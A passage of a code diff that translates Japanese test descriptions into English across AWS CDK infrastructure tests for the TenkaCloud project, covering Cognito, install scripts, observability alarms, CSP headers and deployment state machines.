+  it("should roundtrip actual problem metadata (all 5 kinds)", () => {
     const big = JSON.stringify({
       "hello-world": {
         kind: "flag",
@@ -78,7 +78,7 @@ describe("encodeLargeEnvValue + decodeLargeEnvValue (#810)", () => {
     expect(decodeLargeEnvValue(encodeLargeEnvValue(big))).toBe(big);
   });
 
-  it("圧縮率: JA description 込み 1000+ bytes JSON で encode 後サイズが原文より小さくなるべき", () => {
+  it("compression ratio: encoded size should be smaller than the original for 1000+ byte JSON with JA description", () => {
     const verbose = JSON.stringify({
       p1: { description: "あ".repeat(500), kind: "flag" },
       p2: { description: "い".repeat(500), kind: "flag" },

--- a/infrastructure/test/identity-provider.test.ts
+++ b/infrastructure/test/identity-provider.test.ts
@@ -25,14 +25,14 @@ function synth(
 
 describe("IdentityProvider", () => {
   describe("テナント ID と applicationAdminConsoleUrl を渡してインスタンス化したとき", () => {
-    it("Cognito UserPool / UserPoolClient / UserPoolDomain を 1 セット作るべき", () => {
+    it("should create 1 set of Cognito UserPool / UserPoolClient / UserPoolDomain", () => {
       const { template } = synth("tenant-1", "https://d123abc.cloudfront.net");
       template.resourceCountIs("AWS::Cognito::UserPool", 1);
       template.resourceCountIs("AWS::Cognito::UserPoolClient", 1);
       template.resourceCountIs("AWS::Cognito::UserPoolDomain", 1);
     });
 
-    it("ADR-020 Phase E: tenant UserPool は MFA REQUIRED + TOTP-only に設定するべき", () => {
+    it("ADR-020 Phase E: should configure tenant UserPool with MFA REQUIRED + TOTP-only", () => {
       const { template } = synth("tenant-1", "https://d123abc.cloudfront.net");
       // MFA を REQUIRED にし、 SMS を無効化、 TOTP (SOFTWARE_TOKEN_MFA) のみ許可。
       // destructive 操作を扱う tenant admin console の baseline (OPTIONAL は不可)。
@@ -45,14 +45,14 @@ describe("IdentityProvider", () => {
       );
     });
 
-    it("UserPoolDomain prefix は TenkaCloud-{env}-{tenantId}-{accountId} を lowercase 化して使うべき", () => {
+    it("UserPoolDomain prefix should use lowercased TenkaCloud-{env}-{tenantId}-{accountId}", () => {
       const { template } = synth("Tenant-ABC", "https://example.cloudfront.net", "Development");
       template.hasResourceProperties("AWS::Cognito::UserPoolDomain", {
         Domain: "tenkacloud-development-tenant-abc-123456789012",
       });
     });
 
-    it("UserPoolDomain prefix は env が違えば別の値になるべき (dev/staging 同居対応)", () => {
+    it("UserPoolDomain prefix should differ per env (dev/staging coexistence)", () => {
       const { template: dev } = synth("pooled", "https://example.cloudfront.net", "development");
       const { template: stg } = synth("pooled", "https://example.cloudfront.net", "staging");
       dev.hasResourceProperties("AWS::Cognito::UserPoolDomain", {
@@ -63,7 +63,7 @@ describe("IdentityProvider", () => {
       });
     });
 
-    it("UserPoolClient の callbackUrls に CloudFront URL/callback と localhost:5174/callback を含むべき", () => {
+    it("UserPoolClient callbackUrls should include CloudFront URL/callback and localhost:5174/callback", () => {
       const { template } = synth("tenant-1", "https://d123abc.cloudfront.net");
       template.hasResourceProperties(
         "AWS::Cognito::UserPoolClient",
@@ -76,7 +76,7 @@ describe("IdentityProvider", () => {
       );
     });
 
-    it("UserPoolClient の logoutUrls に CloudFront URL/ と localhost:5174/ を含むべき", () => {
+    it("UserPoolClient logoutUrls should include CloudFront URL/ and localhost:5174/", () => {
       const { template } = synth("tenant-1", "https://d123abc.cloudfront.net");
       template.hasResourceProperties(
         "AWS::Cognito::UserPoolClient",
@@ -89,7 +89,7 @@ describe("IdentityProvider", () => {
       );
     });
 
-    it("UserPoolClient の logoutUrls に /login も含むべき (= beginLogout の logout_uri と一致)", () => {
+    it("UserPoolClient logoutUrls should also include /login (matching beginLogout's logout_uri)", () => {
       const { template } = synth("tenant-1", "https://d123abc.cloudfront.net");
       template.hasResourceProperties(
         "AWS::Cognito::UserPoolClient",
@@ -102,14 +102,14 @@ describe("IdentityProvider", () => {
       );
     });
 
-    it("cognitoDomainUrl を property として公開すべき (https://{prefix}.auth.{region}.amazoncognito.com 形式)", () => {
+    it("should expose cognitoDomainUrl as a property (https://{prefix}.auth.{region}.amazoncognito.com form)", () => {
       const { provider } = synth("tenant-1", "https://example.cloudfront.net");
       expect(provider.cognitoDomainUrl).toBe(
         "https://tenkacloud-development-tenant-1-123456789012.auth.ap-northeast-1.amazoncognito.com",
       );
     });
 
-    it("UserPoolClient の writeAttributes は custom:tenantId を含まないべき (cross-tenant rewrite 防止)", () => {
+    it("UserPoolClient writeAttributes should not include custom:tenantId (cross-tenant rewrite guard)", () => {
       const { template } = synth("tenant-1", "https://d123abc.cloudfront.net");
       const clients = template.findResources("AWS::Cognito::UserPoolClient");
       const writeAttrs = Object.values(clients)[0]?.Properties?.WriteAttributes ?? [];
@@ -126,14 +126,14 @@ describe("IdentityProvider", () => {
       }
     });
 
-    it("UserPoolClient の writeAttributes は email を含むべき (ユーザは自分の email を更新できる)", () => {
+    it("UserPoolClient writeAttributes should include email (users can update their own email)", () => {
       const { template } = synth("tenant-1", "https://d123abc.cloudfront.net");
       const clients = template.findResources("AWS::Cognito::UserPoolClient");
       const writeAttrs = Object.values(clients)[0]?.Properties?.WriteAttributes ?? [];
       expect(writeAttrs).toContain("email");
     });
 
-    it("Issue #748: UserPool schema に custom:tenantName が含まれるべき (mutable=true、 admin 経由で書き換える)", () => {
+    it("Issue #748: UserPool schema should include custom:tenantName (mutable=true, rewritten via admin)", () => {
       const { template } = synth("tenant-1", "https://d123abc.cloudfront.net");
       template.hasResourceProperties(
         "AWS::Cognito::UserPool",
@@ -149,14 +149,14 @@ describe("IdentityProvider", () => {
       );
     });
 
-    it("Issue #748: UserPoolClient の readAttributes は custom:tenantName を含むべき (id_token claim 経路)", () => {
+    it("Issue #748: UserPoolClient readAttributes should include custom:tenantName (id_token claim path)", () => {
       const { template } = synth("tenant-1", "https://d123abc.cloudfront.net");
       const clients = template.findResources("AWS::Cognito::UserPoolClient");
       const readAttrs = Object.values(clients)[0]?.Properties?.ReadAttributes ?? [];
       expect(readAttrs).toContain("custom:tenantName");
     });
 
-    it("Issue #903: 招待メール subject は英語のみであるべき (4 言語混在を廃止)", () => {
+    it("Issue #903: invitation email subject should be English-only (no more 4-language mix)", () => {
       const consoleUrl = "https://d123abc.cloudfront.net";
       const { template } = synth("tenant-1", consoleUrl);
       template.hasResourceProperties(
@@ -171,7 +171,7 @@ describe("IdentityProvider", () => {
       );
     });
 
-    it("Issue #903: 招待メール body は英語のみで、 console URL + Cognito placeholder を含むべき", () => {
+    it("Issue #903: invitation email body should be English-only and include console URL + Cognito placeholder", () => {
       const consoleUrl = "https://d123abc.cloudfront.net";
       const { template } = synth("tenant-1", consoleUrl);
       const userPool = Object.values(template.findResources("AWS::Cognito::UserPool"))[0];
@@ -197,7 +197,7 @@ describe("IdentityProvider", () => {
       expect(body).toContain(consoleUrl);
     });
 
-    it("Issue #903: 各 field (Username / Temporary password / Sign-in URL) が paragraph break (= 二重改行) で区切られるべき", () => {
+    it("Issue #903: should separate each field (Username / Temporary password / Sign-in URL) with paragraph breaks (double newline)", () => {
       // Gmail / Outlook は単一改行を space に re-flow するので、 fields は \n\n で区切らないと
       // 1 行に潰れて読めなくなる (= PR-582 で起きた regression、 Issue #903 でも継続維持)。
       const consoleUrl = "https://d123abc.cloudfront.net";
@@ -214,7 +214,7 @@ describe("IdentityProvider", () => {
       expect(body).toMatch(/\n\nSign-in URL: /);
     });
 
-    it("#529: SMS message も InviteMessageTemplate 整合のため Cognito placeholder 込みで置かれるべき", () => {
+    it("#529: should set the SMS message with Cognito placeholders to stay consistent with InviteMessageTemplate", () => {
       // Cognito CFn は InviteMessageTemplate 設定時に SMSMessage の placeholder 整合性を
       // check する (aws-cdk#30315 系)。SMS は使わないが空にできないので最短形で配置。
       const { template } = synth("tenant-1", "https://d123abc.cloudfront.net");
@@ -232,12 +232,12 @@ describe("IdentityProvider", () => {
   });
 
   describe("Issue #1066: SAML IdP 連携は廃止 (= MFA 必須化 #1035 で代替)", () => {
-    it("UserPoolIdentityProvider (SAML) は作られないべき", () => {
+    it("should not create UserPoolIdentityProvider (SAML)", () => {
       const { template } = synth("tenant-1", "https://app.example.com");
       template.resourceCountIs("AWS::Cognito::UserPoolIdentityProvider", 0);
     });
 
-    it("UserPoolClient の SupportedIdentityProviders は COGNITO のみであるべき", () => {
+    it("UserPoolClient SupportedIdentityProviders should be COGNITO only", () => {
       const { template } = synth("tenant-1", "https://app.example.com");
       template.hasResourceProperties(
         "AWS::Cognito::UserPoolClient",
@@ -250,7 +250,7 @@ describe("IdentityProvider", () => {
 });
 
 describe("buildAllowedRedirectUrls (Issue #861)", () => {
-  it("development では primary + dev localhost を返すべき", () => {
+  it("should return primary + dev localhost in development", () => {
     expect(
       buildAllowedRedirectUrls(
         "https://app.example.com/callback",
@@ -314,7 +314,7 @@ describe("OAuth flow hardening (Issue #861)", () => {
     expect(flows).not.toContain("implicit");
   });
 
-  it("production env では CallbackURLs に localhost が含まれないべき", () => {
+  it("CallbackURLs should not include localhost in production env", () => {
     const template = synthFor("production");
     const clients = template.findResources("AWS::Cognito::UserPoolClient");
     const callbacks = (Object.values(clients)[0]?.Properties?.CallbackURLs ?? []) as string[];

--- a/infrastructure/test/install-script.test.ts
+++ b/infrastructure/test/install-script.test.ts
@@ -19,17 +19,17 @@ describe("scripts/install.sh (Issue #1031: single-phase deploy)", () => {
   const source = readFileSync(INSTALL_SH_PATH, "utf8");
   const prepareBundle = readFileSync(PREPARE_BUNDLE_SH_PATH, "utf8");
 
-  it("`bun cdk deploy --all` で全 stack を 1 発で deploy すべき (#1031)", () => {
+  it("should deploy all stacks in one shot via `bun cdk deploy --all` (#1031)", () => {
     // bash の \ 継続を許容するため、 `--all` と `--require-approval never` を別 line 検査で。
     expect(source).toMatch(/bun cdk deploy --all\b/);
     expect(source).toContain("--require-approval never");
   });
 
-  it("旧 Phase 3 の `CDK_PARAM_ADMIN_CONSOLE_ORIGIN` env injection は廃止すべき (#1031)", () => {
+  it("should retire the legacy Phase 3 `CDK_PARAM_ADMIN_CONSOLE_ORIGIN` env injection (#1031)", () => {
     expect(source).not.toContain("export CDK_PARAM_ADMIN_CONSOLE_ORIGIN=");
   });
 
-  it("旧 Phase 2 で読んでいた backend output 系 env (CDK_PARAM_CONTROL_PLANE_API_URL 等) は廃止すべき (#1031)", () => {
+  it("should retire legacy backend-output env vars read in old Phase 2 (CDK_PARAM_CONTROL_PLANE_API_URL etc.) (#1031)", () => {
     expect(source).not.toContain("CDK_PARAM_CONTROL_PLANE_API_URL");
     expect(source).not.toContain("CDK_PARAM_CONTROL_PLANE_COGNITO_DOMAIN");
     expect(source).not.toContain("CDK_PARAM_CONTROL_PLANE_USER_CLIENT_ID");
@@ -39,26 +39,26 @@ describe("scripts/install.sh (Issue #1031: single-phase deploy)", () => {
   });
 
   // prepare-source-bundle.sh が staging logic の DRY 集約点であることを pin。
-  it("prepare-source-bundle.sh が staging root に repo root `package.json` を copy すべき", () => {
+  it("prepare-source-bundle.sh should copy the repo root `package.json` to the staging root", () => {
     expect(prepareBundle).toContain('cp package.json "${STAGING}/package.json"');
   });
 
-  it("prepare-source-bundle.sh が staging root に `packages` directory を copy すべき (= workspace:* protocol)", () => {
+  it("prepare-source-bundle.sh should copy the `packages` directory to the staging root (workspace:* protocol)", () => {
     expect(prepareBundle).toContain('cp -R packages "${STAGING}/packages"');
   });
 
-  it("prepare-source-bundle.sh が staging package.json の workspaces を `infrastructure` → `cdk` に書き換えるべき", () => {
+  it("prepare-source-bundle.sh should rewrite staging package.json workspaces from `infrastructure` to `cdk`", () => {
     expect(prepareBundle).toContain("pkg['workspaces'] = [w if w != 'infrastructure' else 'cdk'");
   });
 
-  it("install.sh は prepare-source-bundle.sh を source して staging を委譲し、 重複 inline 化しないべき", () => {
+  it("install.sh should source prepare-source-bundle.sh and delegate staging without inlining duplicates", () => {
     expect(source).toContain('source "${SCRIPT_DIR}/prepare-source-bundle.sh"');
     expect(source).not.toContain('cp -R packages "${STAGING}/packages"');
     expect(source).not.toContain('cp -R problems "${STAGING}/problems"');
   });
 
   // Issue #1029 / PR-1028: pooled stack の lifecycle は SBT pipeline 一本化。
-  it("install.sh は tenkacloud-tenant-template-pooled を cdk deploy しないべき (= SBT pipeline 一本化)", () => {
+  it("install.sh should not cdk deploy tenkacloud-tenant-template-pooled (SBT pipeline consolidation)", () => {
     // `bun cdk deploy --all` は `--exclusively` で all を意味するため、 pooled stack を **直接
     // 名指しで deploy しない** ことのみ pin する。 `--all` は app 上 instantiate された stack を
     // 全て deploy するため、 wire.ts で pooled stack を生成する限り CDK が立てに行く。 pooled
@@ -66,7 +66,7 @@ describe("scripts/install.sh (Issue #1031: single-phase deploy)", () => {
     expect(source).not.toMatch(/bun cdk deploy[^\n-][^\n]*tenkacloud-tenant-template-pooled/);
   });
 
-  it("install.sh の repo root 変数は **全大文字** TENKACLOUD_ROOT で統一すべき (= PascalCase 禁止)", () => {
+  it("install.sh repo-root variable should be unified to **all-uppercase** TENKACLOUD_ROOT (no PascalCase)", () => {
     expect(source).not.toMatch(/\$\{TenkaCloud_ROOT[}:]/);
     expect(source).not.toMatch(/\$\{TenkaCloud_Root[}:]/);
     expect(source).toMatch(/\$\{TENKACLOUD_ROOT[}:]/);

--- a/infrastructure/test/observability/cloudwatch-dashboard-stack.test.ts
+++ b/infrastructure/test/observability/cloudwatch-dashboard-stack.test.ts
@@ -73,14 +73,14 @@ function dashboardBody(template: Template): string {
 describe("ObservabilityStack", () => {
   const tpl = synthDefault();
 
-  it("CloudWatch Dashboard resource を 1 つ作るべき", () => {
+  it("should create 1 CloudWatch Dashboard resource", () => {
     tpl.resourceCountIs("AWS::CloudWatch::Dashboard", 1);
     tpl.hasResourceProperties("AWS::CloudWatch::Dashboard", {
       DashboardName: "tenkacloud-observability-test",
     });
   });
 
-  it("DashboardBody に deploy chain / DDB / Lambda / ApiGateway の監視対象を含むべき", () => {
+  it("DashboardBody should include deploy chain / DDB / Lambda / ApiGateway monitoring targets", () => {
     const body = dashboardBody(tpl);
 
     for (const expected of [

--- a/infrastructure/test/observability/cost-budget.test.ts
+++ b/infrastructure/test/observability/cost-budget.test.ts
@@ -10,7 +10,7 @@ import { CostBudget } from "../../lib/observability/cost-budget";
  */
 
 describe("CostBudget", () => {
-  it("budget と SNS topic を作成し、 default 閾値 80% / 100% で 2 件の Notification を生成すべき", () => {
+  it("should create a budget and SNS topic, generating 2 Notifications at default thresholds 80% / 100%", () => {
     const app = new App();
     const stack = new Stack(app, "TestStack");
     new CostBudget(stack, "Budget", {
@@ -36,7 +36,7 @@ describe("CostBudget", () => {
     expect(notifications?.length).toBe(2);
   });
 
-  it("notificationEmails に重複があっても SNS Subscription は 1 件にまとまるべき", () => {
+  it("should collapse duplicate notificationEmails into a single SNS Subscription", () => {
     const app = new App();
     const stack = new Stack(app, "TestStack");
     new CostBudget(stack, "Budget", {
@@ -49,7 +49,7 @@ describe("CostBudget", () => {
     template.resourceCountIs("AWS::SNS::Subscription", 1);
   });
 
-  it("notificationEmails が空でも construct 自体は壊れず、 Subscription は 0 件すべき", () => {
+  it("should keep the construct intact and have 0 Subscriptions when notificationEmails is empty", () => {
     const app = new App();
     const stack = new Stack(app, "TestStack");
     new CostBudget(stack, "Budget", {
@@ -63,7 +63,7 @@ describe("CostBudget", () => {
     template.resourceCountIs("AWS::SNS::Subscription", 0);
   });
 
-  it("thresholdPercents 上書きで Notification 数が変わるべき", () => {
+  it("overriding thresholdPercents should change the Notification count", () => {
     const app = new App();
     const stack = new Stack(app, "TestStack");
     new CostBudget(stack, "Budget", {
@@ -85,7 +85,7 @@ describe("CostBudget", () => {
 
   // Issue #952 / PR-957 user feedback: TenkaCloud リソースだけを集計するため、 user-defined
   // cost allocation tag (= App scope `Project=TenkaCloud`) で filter を絞る経路を pin する。
-  it("costAllocationTags を渡すと CfnBudget の CostFilters に `user:<Key>$<Value>` 形式で入るべき", () => {
+  it("should add `user:<Key>$<Value>` entries to CfnBudget CostFilters when costAllocationTags is passed", () => {
     const app = new App();
     const stack = new Stack(app, "TestStack");
     new CostBudget(stack, "Budget", {
@@ -105,7 +105,7 @@ describe("CostBudget", () => {
     expect(costFilters["user:Project"]).toEqual(["Project$TenkaCloud"]);
   });
 
-  it("costAllocationTags 未指定なら CostFilters key 自体が無いべき (= 全アカウント費用が対象)", () => {
+  it("should omit the CostFilters key entirely when costAllocationTags is unset (all account spend counted)", () => {
     const app = new App();
     const stack = new Stack(app, "TestStack");
     new CostBudget(stack, "Budget", {

--- a/infrastructure/test/observability/free-tier-alarms.test.ts
+++ b/infrastructure/test/observability/free-tier-alarms.test.ts
@@ -22,7 +22,7 @@ function buildStack() {
 }
 
 describe("FreeTierAlarms (#952 cost guardrails)", () => {
-  it("Lambda 2 個 + DDB 1 個なら計 6 個の Alarm を生成すべき (Lambda invocations + Lambda errors + DDB read/write)", () => {
+  it("should generate 6 Alarms for 2 Lambdas + 1 DDB table (Lambda invocations + Lambda errors + DDB read/write)", () => {
     const { stack, topic } = buildStack();
     new FreeTierAlarms(stack, "Alarms", {
       notificationTopic: topic,
@@ -70,7 +70,7 @@ describe("FreeTierAlarms (#952 cost guardrails)", () => {
     });
   });
 
-  it("各 Alarm は SNS topic action を持つべき", () => {
+  it("each Alarm should have an SNS topic action", () => {
     const { stack, topic } = buildStack();
     new FreeTierAlarms(stack, "Alarms", {
       notificationTopic: topic,
@@ -84,7 +84,7 @@ describe("FreeTierAlarms (#952 cost guardrails)", () => {
     expect(Array.isArray(first?.Properties?.AlarmActions)).toBe(true);
   });
 
-  it("override threshold が反映されるべき", () => {
+  it("override threshold should be applied", () => {
     const { stack, topic } = buildStack();
     new FreeTierAlarms(stack, "Alarms", {
       notificationTopic: topic,
@@ -104,7 +104,7 @@ describe("FreeTierAlarms (#952 cost guardrails)", () => {
     });
   });
 
-  it("英数以外を含む resource 名 (= dot / hyphen) でも logical ID 衝突しないべき", () => {
+  it("should not collide on logical IDs even for resource names containing non-alphanumerics (dot / hyphen)", () => {
     const { stack, topic } = buildStack();
     new FreeTierAlarms(stack, "Alarms", {
       notificationTopic: topic,
@@ -116,7 +116,7 @@ describe("FreeTierAlarms (#952 cost guardrails)", () => {
     tpl.resourceCountIs("AWS::CloudWatch::Alarm", 4);
   });
 
-  it("#1080: Lambda errors alarm を立てるべき (metric=Errors / threshold=default 50)", () => {
+  it("#1080: should provision a Lambda errors alarm (metric=Errors / threshold=default 50)", () => {
     const { stack, topic } = buildStack();
     new FreeTierAlarms(stack, "Alarms", {
       notificationTopic: topic,
@@ -132,7 +132,7 @@ describe("FreeTierAlarms (#952 cost guardrails)", () => {
     });
   });
 
-  it("#1080: API Gateway 5XX alarm を HTTP / REST 両方に立てるべき", () => {
+  it("#1080: should provision an API Gateway 5XX alarm for both HTTP and REST APIs", () => {
     const { stack, topic } = buildStack();
     new FreeTierAlarms(stack, "Alarms", {
       notificationTopic: topic,

--- a/infrastructure/test/participant-portal-hosting.test.ts
+++ b/infrastructure/test/participant-portal-hosting.test.ts
@@ -38,7 +38,7 @@ describe("ParticipantPortalHosting", () => {
   });
 
   describe("CloudFront security headers (CSP) — Issue #896", () => {
-    it("connect-src に execute-api / lambda-url の region 付き wildcard を含むべき", () => {
+    it("connect-src should include region-scoped wildcards for execute-api / lambda-url", () => {
       const template = synth();
       const policies = template.findResources("AWS::CloudFront::ResponseHeadersPolicy");
       const policy = Object.values(policies)[0];
@@ -48,7 +48,7 @@ describe("ParticipantPortalHosting", () => {
       expect(cspJson).toContain(".lambda-url.");
     });
 
-    it("middle wildcard (CSP3 spec 違反 pattern) を含むべきでない", () => {
+    it("should not contain middle wildcards (CSP3 spec violation pattern)", () => {
       const template = synth();
       const policies = template.findResources("AWS::CloudFront::ResponseHeadersPolicy");
       const policy = Object.values(policies)[0];

--- a/infrastructure/test/problem-deploy-backend-stack.test.ts
+++ b/infrastructure/test/problem-deploy-backend-stack.test.ts
@@ -26,7 +26,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
   const tpl = synthDefault();
 
   describe("Deployments DDB table", () => {
-    it("DDB テーブルを Deployments / Events / Teams / CompetitorAccounts / ProblemEndpoints / Disruptions / AdminAuditLog の 7 つ持ち、各 PK/SK + PROVISIONED 1/1 であるべき", () => {
+    it("should provision 7 DDB tables (Deployments / Events / Teams / CompetitorAccounts / ProblemEndpoints / Disruptions / AdminAuditLog) each with PK/SK and PROVISIONED 1/1", () => {
       // ADR-004 Phase 1 で Events / Teams、Issue #459 / ADR-002 Phase 2.1 で CompetitorAccounts、
       // ADR-012 Phase 3.A で ProblemEndpoints、 Issue #888 で Disruptions (Red Team audit + idempotency)、
       // Issue #950 (ADR-020 Phase D) で AdminAuditLog (admin 操作監査)。
@@ -47,7 +47,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
       );
     });
 
-    it("expiresAt の TTL を有効化すべき", () => {
+    it("should enable TTL on expiresAt", () => {
       tpl.hasResourceProperties(
         "AWS::DynamoDB::Table",
         Match.objectLike({
@@ -60,8 +60,8 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
     });
   });
 
-  describe("Deploy API Lambda (tenant API から invoke される)", () => {
-    it("Node.js 22 / arm64 で BATTLE_PROBLEMS_CATALOG env を持つべき", () => {
+  describe("Deploy API Lambda (invoked from tenant API)", () => {
+    it("should run on Node.js 22 / arm64 with BATTLE_PROBLEMS_CATALOG env", () => {
       tpl.hasResourceProperties(
         "AWS::Lambda::Function",
         Match.objectLike({
@@ -80,7 +80,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
 
     // #534: CFn StackEvents / StackResources を読む IAM Allow を持つべき
     // (= deploy job 詳細ページから直接 CFn API を叩くため)。
-    it("CFn DescribeStackEvents / DescribeStackResources を Allow にすべき", () => {
+    it("should Allow CFn DescribeStackEvents / DescribeStackResources", () => {
       tpl.hasResourceProperties(
         "AWS::IAM::Policy",
         Match.objectLike({
@@ -100,12 +100,12 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
     });
   });
 
-  describe("CodeBuild Project (deploy-battles.sh を実行)", () => {
-    it("CodeBuild Project を 1 つ作るべき", () => {
+  describe("CodeBuild Project (runs deploy-battles.sh)", () => {
+    it("should create 1 CodeBuild Project", () => {
       tpl.resourceCountIs("AWS::CodeBuild::Project", 1);
     });
 
-    it("CodeBuild は S3 source を読むべき", () => {
+    it("CodeBuild should read from S3 source", () => {
       tpl.hasResourceProperties(
         "AWS::CodeBuild::Project",
         Match.objectLike({
@@ -117,7 +117,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
       );
     });
 
-    it("`deployConcurrentBuildLimit` 未指定なら ConcurrentBuildLimit を出力しないべき (#538)", () => {
+    it("should not output ConcurrentBuildLimit when `deployConcurrentBuildLimit` is unset (#538)", () => {
       // 未指定 = AWS account 全体の concurrent build quota (region default 60) を本 Project
       // でフルに使う既存挙動。本 stack の default props で synth した時点で property が
       // 出ていないことを保証する (= 既存運用への regression 防止)。
@@ -132,7 +132,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
   describe("CodeBuild Project concurrent build limit (#538)", () => {
     // synth が 5 個の NodejsFunction (= esbuild bundling) を走らせるため、default 5s では足りない。
     // 共有 fixture (`tpl = synthDefault()`) と別 props を渡すので別 instance での synth が必要。
-    it("`deployConcurrentBuildLimit: 200` を渡したら CFn property に反映されるべき", () => {
+    it("should reflect `deployConcurrentBuildLimit: 200` in the CFn property", () => {
       const app = new cdk.App();
       const stack = new ProblemDeployBackendStack(app, "TestStackWithLimit", {
         eventBusArn: "arn:aws:events:ap-northeast-1:123456789012:event-bus/test-bus",
@@ -153,11 +153,11 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
   });
 
   describe("Step Functions State Machine + EventBridge Rule", () => {
-    it("Create / Delete / BulkCreate の State Machine を 3 つ作るべき (Issue #910 Phase 2.C.2.a)", () => {
+    it("should create 3 State Machines (Create / Delete / BulkCreate) (Issue #910 Phase 2.C.2.a)", () => {
       tpl.resourceCountIs("AWS::StepFunctions::StateMachine", 3);
     });
 
-    it("Create State Machine は CodeBuild 起動前に PENDING → IN_PROGRESS の中間遷移を書くべき", () => {
+    it("Create State Machine should write the PENDING → IN_PROGRESS intermediate transition before starting CodeBuild", () => {
       // RUN_JOB 同期 CodeBuild は 5〜15 分かかるため、この中間書込が無いと operator UI が
       // PENDING のまま固定して polling が機能していないように見える (#159 の再発防止)。
       const stateMachines = tpl.findResources("AWS::StepFunctions::StateMachine");
@@ -166,7 +166,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
       expect(synthJson).toContain("IN_PROGRESS");
     });
 
-    it("Create State Machine は完了/失敗時に CodeBuild buildId を Deployments row へ保存すべき", () => {
+    it("Create State Machine should persist the CodeBuild buildId into the Deployments row on completion/failure", () => {
       const stateMachines = tpl.findResources("AWS::StepFunctions::StateMachine");
       const createStateMachine = Object.values(stateMachines)
         .map((stateMachine) => JSON.stringify(stateMachine))
@@ -184,7 +184,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
       expect(createStateMachine).toContain("$.codebuild.Build.Id");
     });
 
-    it("Create State Machine は CodeBuild timeout / AccessDenied を Catch して FAILED に倒すべき", () => {
+    it("Create State Machine should Catch CodeBuild timeout / AccessDenied and fall to FAILED", () => {
       const stateMachines = tpl.findResources("AWS::StepFunctions::StateMachine");
       const createStateMachine = Object.values(stateMachines)
         .map((stateMachine) => JSON.stringify(stateMachine))
@@ -199,7 +199,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
       expect(createStateMachine).toContain("MarkFailedWithoutBuildId");
     });
 
-    it("Create State Machine は ROLLBACK_COMPLETE を terminal failure として MarkFailed に倒すべき", () => {
+    it("Create State Machine should treat ROLLBACK_COMPLETE as terminal failure and fall to MarkFailed", () => {
       const stateMachines = tpl.findResources("AWS::StepFunctions::StateMachine");
       const createStateMachine = Object.values(stateMachines)
         .map((stateMachine) => JSON.stringify(stateMachine))
@@ -216,7 +216,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
       expect(createStateMachine).toContain("MarkFailed");
     });
 
-    it("Create State Machine は DescribeStacks を Lambda 経由で実行すべき (#762)", () => {
+    it("Create State Machine should run DescribeStacks via Lambda (#762)", () => {
       const stateMachines = tpl.findResources("AWS::StepFunctions::StateMachine");
       const createStateMachine = Object.values(stateMachines)
         .map((stateMachine) => JSON.stringify(stateMachine))
@@ -233,7 +233,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
       expect(createStateMachine).not.toContain("States.Format('{}', $.detail.competitorRoleArn)");
     });
 
-    it("Delete State Machine は AssumeRole metadata の有無を Choice で分岐し、欠落 path 参照で runtime 死しないべき (#758)", () => {
+    it("Delete State Machine should Choice on the presence of AssumeRole metadata and not die at runtime on missing path references (#758)", () => {
       const stateMachines = tpl.findResources("AWS::StepFunctions::StateMachine");
       const deleteStateMachine = Object.values(stateMachines)
         .map((stateMachine) => JSON.stringify(stateMachine))
@@ -248,7 +248,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
       expect(deleteStateMachine).toContain("MarkFailed");
     });
 
-    it("EventBridge Rule を Create / Delete / BulkCreate / GenericScoring / ExternalIdAudit schedule / SystemAuditWriter (Issue #1034) / CodeBuildFailure (Issue #1029) で 7 つ持つべき", () => {
+    it("should have 7 EventBridge Rules (Create / Delete / BulkCreate / GenericScoring / ExternalIdAudit schedule / SystemAuditWriter (Issue #1034) / CodeBuildFailure (Issue #1029))", () => {
       // 旧 2 (Create / Delete state-machine event rules)
       //   + BulkCreate (Issue #910 Phase 2.C: BulkDeployCreateRequested → Distributed Map)
       //   + GenericScoring schedule rate(1 minute) (= ADR-012 Phase 3.B、 旧 HealthCheck 後継)
@@ -290,7 +290,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
       );
     });
 
-    it("GenericScoring Lambda が table name env を持ち catalog env は持たないべき", () => {
+    it("GenericScoring Lambda should have table-name env without the catalog env", () => {
       // Issue #1158: BATTLE_PROBLEMS_SCORING / PROBLEM_ENDPOINTS / BATTLE_PROBLEMS_PHASES は
       // env vars 4 KB 上限を回避するため esbuild bundling.define で build 時 literal 置換し、
       // Lambda env からは取り除いている。 catalog 配線は handler の `process.env.X` 読み取りが
@@ -316,19 +316,19 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
   });
 
   describe("Outputs", () => {
-    it("DeploymentsTableName と DeployCreateStateMachineArn を Output として持つべき", () => {
+    it("should expose DeploymentsTableName and DeployCreateStateMachineArn as Outputs", () => {
       const outputs = tpl.findOutputs("*");
       expect(Object.keys(outputs)).toEqual(
         expect.arrayContaining(["DeploymentsTableName", "DeployCreateStateMachineArn"]),
       );
     });
 
-    it("ADR-012 Phase 3.A: ProblemEndpointsTableName を Output として持つべき", () => {
+    it("ADR-012 Phase 3.A: should expose ProblemEndpointsTableName as an Output", () => {
       const outputs = tpl.findOutputs("*");
       expect(Object.keys(outputs)).toEqual(expect.arrayContaining(["ProblemEndpointsTableName"]));
     });
 
-    it("Issue #1053: CompetitorBootstrapTemplateUrl を Output として持つべき", () => {
+    it("Issue #1053: should expose CompetitorBootstrapTemplateUrl as an Output", () => {
       // hosting を AdminConsoleHostingStack から移管したため、 本 stack が出力 owner。
       // SaaS の AdminConsoleHosting と Lite / SaaS の ApplicationAdminConsoleHosting が
       // cross-stack ref で受け取る。
@@ -340,7 +340,7 @@ describe("ProblemDeployBackendStack (MVP-1)", () => {
   });
 
   describe("Issue #1053: CompetitorBootstrapHosting (公開 S3 hosting)", () => {
-    it("public-read な S3 bucket を 1 つ追加で作るべき (= 旧 AdminConsoleHostingStack から移管)", () => {
+    it("should create 1 additional public-read S3 bucket (migrated from the old AdminConsoleHostingStack)", () => {
